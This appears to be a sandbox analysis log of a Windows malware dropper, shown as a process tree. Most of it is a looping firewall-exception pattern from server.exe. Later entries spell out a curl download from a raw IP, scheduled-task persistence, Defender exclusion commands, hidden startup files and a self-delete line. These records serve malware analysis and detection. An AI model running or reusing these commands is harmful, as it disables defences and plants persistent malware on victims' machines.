        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        157⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        157⤵
        Modifies Windows Firewall
        
        PID:6188
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        157⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        157⤵
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        158⤵
        
        PID:6372
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        159⤵
        
        PID:7032
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        159⤵
        Modifies Windows Firewall
        
        PID:5364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        160⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        159⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        159⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        160⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        161⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        161⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        161⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        161⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        162⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        163⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        163⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        163⤵
        Modifies Windows Firewall
        
        PID:6704
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        163⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        164⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        165⤵
        Modifies Windows Firewall
        
        PID:5488
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        165⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        165⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        165⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        166⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        167⤵
        
        PID:860
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        167⤵
        Modifies Windows Firewall
        
        PID:572
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        167⤵
        Modifies Windows Firewall
        
        PID:4072
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        167⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        168⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        169⤵
        Modifies Windows Firewall
        
        PID:2256
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        169⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        169⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        169⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        170⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        171⤵
        Modifies Windows Firewall
        
        PID:5052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        172⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        171⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        171⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        171⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        172⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        173⤵
        Modifies Windows Firewall
        
        PID:6852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        173⤵
        Modifies Windows Firewall
        
        PID:5284
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        173⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        173⤵
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        174⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        175⤵
        Modifies Windows Firewall
        
        PID:5472
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        175⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        175⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        175⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        176⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        177⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        177⤵
        Modifies Windows Firewall
        
        PID:5552
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        177⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        177⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        178⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        179⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        179⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        179⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        179⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        180⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        181⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        181⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        181⤵
        Modifies Windows Firewall
        
        PID:5080
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        181⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        182⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        183⤵
        
        PID:856
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        183⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        183⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        183⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        184⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        185⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        185⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        185⤵
        
        PID:608
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        185⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        186⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        187⤵
        Modifies Windows Firewall
        
        PID:336
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        187⤵
        
        PID:6884
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        187⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        187⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        188⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        189⤵
        Modifies Windows Firewall
        
        PID:6848
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        189⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        189⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        189⤵
        
        PID:6884
    - - C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe"
        5⤵
        Executes dropped EXE
        
        PID:3532
    - - C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"
        5⤵
        
        PID:1184
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pHash.bat
        6⤵
        
        PID:2116
        
        C:\Windows\system32\curl.exe
        
        curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"
        7⤵
        
        PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\Files\xxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\xxx.exe"
        5⤵
        
        PID:1004
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3100
    - - C:\Users\Admin\AppData\Local\Temp\Files\installer.exe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\installer.exe.exe"
        5⤵
        
        PID:6824
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6896
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5908
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5252
    - - C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3432
    - - C:\Users\Admin\AppData\Local\Temp\Files\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Client.exe"
        5⤵
        
        PID:1124
      - C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe"
        6⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        7⤵
        
        PID:1120
    - - C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"
        5⤵
        
        PID:4920
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
        6⤵
        
        PID:6312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff9c33c3cb8,0x7ff9c33c3cc8,0x7ff9c33c3cd8
        7⤵
        
        PID:3580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
        7⤵
        
        PID:6440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 /prefetch:3
        7⤵
        
        PID:6252
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
        7⤵
        
        PID:6280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
        7⤵
        
        PID:5356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
        7⤵
        
        PID:2708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
        7⤵
        
        PID:5420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
        7⤵
        
        PID:4076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 /prefetch:8
        7⤵
        
        PID:2844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6092 /prefetch:8
        7⤵
        
        PID:6480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
        7⤵
        
        PID:6620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
        7⤵
        
        PID:2000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
        7⤵
        
        PID:6888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,15851335158187148953,16170347117671552151,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4928 /prefetch:2
        7⤵
        
        PID:6996
    - - C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe"
        5⤵
        
        PID:3104
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
        6⤵
        Views/modifies file attributes
        
        PID:5772
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
        6⤵
        Views/modifies file attributes
        
        PID:6880
    - - C:\Users\Admin\AppData\Local\Temp\Files\lyjdfjthawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\lyjdfjthawd.exe"
        5⤵
        
        PID:1632
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\lyjdfjthawd.exe" & rd /s /q "C:\ProgramData\GDAECAECFCAA" & exit
        6⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:6288
    - - C:\Users\Admin\AppData\Local\Temp\Files\Ttok18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Ttok18.exe"
        5⤵
        
        PID:6588
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AxnupvdOhS'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AxnupvdOhS
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5900
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6960
      - C:\AxnupvdOhS\d8db9158-95fb-46c1-96e2-59fa12568afe.exe
        
        "C:\AxnupvdOhS\d8db9158-95fb-46c1-96e2-59fa12568afe.exe"
        6⤵
        
        PID:2256
    - - C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe"
        5⤵
        
        PID:4864
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5132
      - C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"
        6⤵
        
        PID:7064
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5912
    - - C:\Users\Admin\AppData\Local\Temp\Files\fdaerghawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\fdaerghawd.exe"
        5⤵
        
